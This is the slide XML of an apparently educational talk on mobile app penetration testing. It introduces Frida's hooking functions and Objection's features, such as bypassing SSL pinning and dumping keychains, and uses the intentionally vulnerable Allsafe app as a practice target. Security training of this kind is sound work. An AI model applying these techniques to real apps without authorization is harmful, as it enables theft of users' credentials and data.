          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frida : https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>frida.re</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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8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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Python bindings are provided with Frida</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, the hooks need to be written in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> :(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Here are the basics Frida functions :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Java.use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Use a specific Java class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perform(function(){//code}) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: Perform code instrumentation inside the code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>overload : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Overload a specific method (functions with different prototypes) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> : Tamper the implementation of the selected method</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>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dirty="0"/>
              <a:t>Frida : https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>frida.re</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="Frida · GitHub"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="5093" t="37427" r="5991" b="35446"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7658722" y="278939"/>
            <a:ext cx="1266088" cy="38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623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buSzPct val="150000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A runtime mobile exploration toolkit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>powered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to easily assess the security posture of mobile applications, without needing a jailbreak.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>both iOS and Android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect and interact with container file systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypass SSL pinning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dump keychains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform memory related tasks, such as dumping &amp; patching.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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a:t>Objection : https://github.com/sensepost/objection</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52226" name="Picture 2" descr="obj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978" y="110116"/>
            <a:ext cx="1400832" cy="68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6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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Am I ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1628800"/>
            <a:ext cx="8229600"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itchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Abdessamad TEMMAR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Engineer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> / Ex - full time Pentester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Contributor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : MSTG/MASVS/OPA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" dirty="0"/>
              <a:t>Speaker/Trainer : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sec4dev On-line 2021, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DevOpsDays</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Berlin 2019, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BSides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Las Vegas 2019, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DevSeCon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Boston 2018, OWASP AppSec Africa 2016/2018</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;317;p34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{370DAC1E-409D-4AC9-8583-570D408E1B46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5229200"/>
            <a:ext cx="8229600" cy="122723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47B8D3"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="47B8D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chemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>TWITTER : @abdel_tmr</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>LINKEDIN : /in/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>abdessamad-temmar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429069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err="1"/>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>tools</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And now …</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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73" y="1828799"/>
            <a:ext cx="7805854" cy="3200402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1305895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F145-143E-44E1-ABA4-68D8049EFC7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9379511-431F-4F8A-AE5A-B6471494F3D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Rectangle 133123">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE1E5671-B01E-4B19-B868-8061487D2B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063" y="4568825"/>
            <a:ext cx="2428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6D16A9A1-F2B7-4756-8180-2FEB52453EF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="393330" y="3046784"/>
            <a:ext cx="5367337" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83EEADC9-C584-41B7-9726-98F69C97D82F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536574" y="1813635"/>
            <a:ext cx="4679950" cy="3814167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> VM/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tools</a:t>
            </a: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r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacking mobile apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>testing</a:t>
            </a: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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6757013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1" y="1447801"/>
            <a:ext cx="8232900" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>intentionally vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>application that contains various vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unlike other vulnerable Android apps, this one is less like a CTF and more like a real-life application (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Shopify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, Skype, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) that uses modern libraries and technologies. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100" dirty="0"/>
              <a:t>3 Levels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Our main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> !</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49870" t="4590" r="2665" b="64936"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3321296" y="4115791"/>
            <a:ext cx="1096963" cy="528915"/>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2887" t="34670" r="49992" b="34917"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4473770" y="4116326"/>
            <a:ext cx="1089025" cy="527844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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2910" t="4658" r="50004" b="64471"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2177554" y="4106014"/>
            <a:ext cx="1088231" cy="535781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6963507" y="27957"/>
            <a:ext cx="2056214" cy="778566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2235662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Structure</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leche bleue3 - Dolmen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E4C4AE-DF39-47AF-A296-9E7130F40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27838">
            <a:off x="5373779" y="2254652"/>
            <a:ext cx="1335652"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A96518-9262-4633-94B5-2F5D848A16C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860427" y="1768128"/>
            <a:ext cx="4578350" cy="456535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Basics &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>definitions</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0322FEE-B02B-4CEB-9ADF-DD78A7EBF704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
